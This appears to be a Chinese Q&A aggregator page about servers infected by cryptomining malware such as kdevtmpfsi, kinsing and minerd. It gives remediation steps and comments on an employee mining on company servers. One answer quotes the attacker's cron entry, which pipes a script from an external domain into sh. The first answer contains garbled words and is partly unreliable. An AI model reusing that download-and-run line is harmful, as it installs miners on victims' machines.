当前位置:首页 » 挖矿知识 » 服务器被安装挖矿

服务器被安装挖矿

发布时间: 2024-03-20 04:36:02

❶ 新买的云服务器提示挖矿

利用云电脑的计算资源执行挖矿的持续性程序,
已停止是服务绝大数都是正常的。这些已停止表示你已经禁用或停止了相关的服务,但停止不是卸载,所以它们仍然存在是正常的,每台电脑里都有许多已停止的差念服务,不用担心。你真正要担心的是360那个提示,可在任务管理器中查着虚兄困活动进程,若某进程CPU或内存占用高,而你又不明确该进程是尘肢干嘛的,可以先结束进程再看看360还会不会提醒!

❷ 蔚来员工利用公司服务器挖矿,这一行为是否违法

蔚来员工利用职务之便,从2021年2月开始使用公司服务器进行挖矿,从中获取利益,这个行为明显已经触犯了我国的相关法律。

其实利用公司资源进行非法挖矿行为早有先例,在2018年1月到5月期间,网络一个运维员工就曾经在网络公司服务器上安装挖矿程序,通过公司的资源谋取暴利,之后将挖矿所得的虚拟货币卖出,从中获得10万元人民币,后来,在网络公司的追查下,这名员工才被发现,并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年,并处罚金1.1万元,扣押违法所得10万元整。

而对于挖矿这个行为,国家是坚决打击的,目前相关的省份也出台了相关的文件,表面上只是提高了挖矿公司的电费,实际上是为了让从事挖矿的人员知难而退,因为电费一旦上涨,那么相对应的挖矿成本也就增加了。

综上所述,该蔚来员工利用职务之便进行挖矿行为,已经涉嫌非法控制计算机信息系统罪,所以,他极有可能会因为此罪名而被起诉。

❸ windows服务器的挖矿进程怎么关闭删除

这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后,使用里面的病毒查杀功能,直接就可以查杀这种电脑病毒了

❹ 服务器被rshim挖矿病毒攻击后 HugePages_Total 透明大页怎么都清不掉 一直占用内存 球球

问题定位及解决步骤:

1、free -m 查看内存使用状态 ,发现free基本没了。--> 怀疑是服务有内存泄漏,开始排查

2、使用top命令观察,开启的服务占用内存量并不大,且最终文档在一个值,且服务为java应用,内存并没达到父jvm设置上限。按top监控占用内存排序,加起来也不会超过物理内存总量。查看硬盘使用量,占用20%。基本排除虚拟内存占用过大的原因。--->排除服务内存泄漏因素,怀疑mysql和nginx,开始排查

3、因为top命令看 mysql占用内存也再可控范围,是否存在connection占用过多内存,发现并不会,设置最大连接数为1000,最多也不会超过几M。 nginx占用一直非常小。但每次最先被kill的基本都是nginx进程。所以排查,但发现无非就是openfiles数量啥的调整。发现也一切正常。且之前niginx可以正常使用的。

4、最为费解的就是 通过free -m 查看的时候 基本全是used,cache部分很少,free基本没有。但top上又找不到有哪些进程占用了内存。无解

5、注意到有两个进程虽占用内存不多,但基本耗光了100%的cpu。开始想着占cpu就占了,没占内存,现在是内存不不够导致进程被kill的,就没注意这点。

6、实在搞不定,重启服务器,重启了所有服务,服务暂时可用,回家。在路上的时候发现又崩了。忐忑的睡觉。

7、早上起来继续看,这次留意注意了下那两个占用高cpu的进程,kdevtmpfsi 和 networkservice。本着看看是啥进程的心态,网络了下。真相一目了然,两个挖矿病毒。

突然后知后觉的意识到错误原因:

1、cpu占用率高,正常服务使用cpu频率较高的服务最容易最内存超标。(因为在需要使用cpu时没cpu资源,内存大量占用,服务瞬间崩溃),然后看top发现刚刚已经占用内存的进程已经被kill了,所以没发现内存有高占用的情况。
2、后面的应用继续使用cpu时也会发生类似情况,倒是服务一个一个逐渐被kill。

问题点基本定位好了,解决问题就相对简单很多:
通过网络,google,常见的病毒清除步骤基本都能解决。这两个挖矿病毒很常见,大致记录下要点。可能所有病毒都会有这些基础操作。

① 首先,查看当前系统中的定时任务:crontab -l
我服务器上有四个定时下载任务 通过wget 和 curl 下载病毒文件,把异常的删掉。要不然删了病毒文件还是会下载下来
crontab -r,全部删除命令(或根据需求删除定时任务)

② 查找病毒文件 可以全部模糊搜索 清除, 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 后再使用rm -f filename 。可删除

③ kill 病毒进程,但注意kill了可能马上就重启了。因为有守护进程,需要把病毒进程的守护进程也kill掉

④ 检查是否root用户被攻击,可能系统配置信息被更改。

⑤ 最好能理解病毒脚本,通过看代码看它做了些什么。针对脚本取修复系统。

❺ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:

View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

❻ 服务器集群感染了挖矿木马该怎么办

企业电脑可以去腾讯安全申请个腾讯御点
然后使用这个软件选择左侧的病毒查杀
用来对服务器里面的木马病毒进行查杀了检测就行

❼ 蔚来的员工被曝利用服务器挖矿,这是否会影响到蔚来的经营

蔚来汽车为何又被曝出不良事件?

员工被曝光出利用公司的电脑挖矿,这会对公司产生不良的影响。

既然此件事情已经报告出来,蔚来公司一定会寄出一个合理的答复。我们也希望这个回复可以越快越好,毕竟作为一个国内知名的新能源汽车品牌,他们已经在公众的心目当中有了一个公信度,在如此关键的成长阶段出现这么不好的负面新闻,稍微处理不善就有可能将其品牌的公信度大大减少,并且影响到今后的新品汽车发售以及销售问题。也希望官方能够注意到这件事情的严重性,从公司的内部进行一次彻彻底底的大审查,争取杜绝今后再在企业内部发生这样的事情。

❽ 服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马

MongoDB库中的数据莫名其妙没有了,发觉如下信息:

1、 top -d 5命令 ,查看系统负载情况、是否有未知进程,发现一个名为kdevtmpfsi的进程,经科普它是一个挖矿程序,会占用服务器高额的CPU、内存资源。如图,CPU占用率高达788.7%,而且是yarn用户下:

2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径:/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息(此时我的服务器并没有开启yarn服务,如果有yarn的相关进程则可判断是攻击者开启的进程),发现另外还有个kinsing进程,经科普kinsing进程是kdevtmpfsi的守护进程:

4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip,判断是kdevtmpfsi的发出者:

5、经查询该ip的所在国家是俄罗斯:

6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除:

7、 cd /tmp 进入相关目录:

8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序:

9、** kill -9 40422**杀掉kdevtmpfsi进程:

10、发现并没杀掉所有kdevtmpfsi进程,再次查找yarn的相关进程(因为之前已确认病毒是在yarn下),果真还有kdevtmpfsi进程存在:

11、用命令 批量杀掉 相关进程:

12、删除kinsing文件:

13、现在,已经把挖矿程序及相关进程删除掉了,但是还有两处没做处理:

14、 crontab -l 命令先看看crontab的定时任务列表吧:

15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh

16、新增 定时任务 并删除攻击者的挖矿定时任务:

17、 crontab -l命令 查看现在只有杀进程的定时任务了:

18、禁止黑客的IP地址。

最初安装MongoDB时,并未设置密码认证,存在漏洞,导致黑客通过漏洞攻击服务器,并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的,治标不治本,应该定时删除病毒进程,禁止攻击者IP,重新安装系统或相关软件。

经过几天的观察,服务器运行正常,再没有被黑客攻击成功。

❾ 服务器被检测出挖矿

有位朋友说,他服务器使用的好好的,服务商突然封了他服务器,说是被检测出挖矿,这位朋友一脸懵“我开游戏的,挖什么矿”。突然地关停服务器导致这位朋友损失惨重,那么为什么会被检测出挖矿,以及怎么处理呢?感兴趣的话就继续往下看吧~

遇到以上问题,需要先找服务器商对其说明实际情况,配合他们排查,基本上就是中了挖矿病毒。

最简单的方法就是重装系统,但是系统盘数据都会清空,这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统,需要把自己的文件扫毒一遍确认安全后再导入服务器。

但是服务器里如果有很多重要的文件还有比较难配置的环境,那就需要排查删除挖矿程序,全盘扫毒,删除可疑文件,一个个修复病毒对系统的修改。

防范建议:

1.尽量不要使用默认密码和端口,改一个比较复杂的密码

2.可以使用宝塔面板登陆服务器

3.系统自带的防火墙、安全防护都不要关闭

热点内容
C币和比特币 发布:2024-04-24 18:50:15 浏览:903
迷你世界鱼豆姐姐单人生存挖矿 发布:2024-04-24 18:21:35 浏览:466
马斯克以太币幸运以太坊 发布:2024-04-24 17:30:04 浏览:455
寿县矿机 发布:2024-04-24 17:25:33 浏览:553
现在还有cpu挖矿吗 发布:2024-04-24 17:14:31 浏览:246
如何购买以数字货币 发布:2024-04-24 17:04:22 浏览:305
bde是正规的区块链吗 发布:2024-04-24 16:24:32 浏览:332
迷你世界什样挖矿 发布:2024-04-24 16:11:39 浏览:553
比特币称呼 发布:2024-04-24 15:31:53 浏览:652
医疗保健区块链 发布:2024-04-24 15:25:10 浏览:6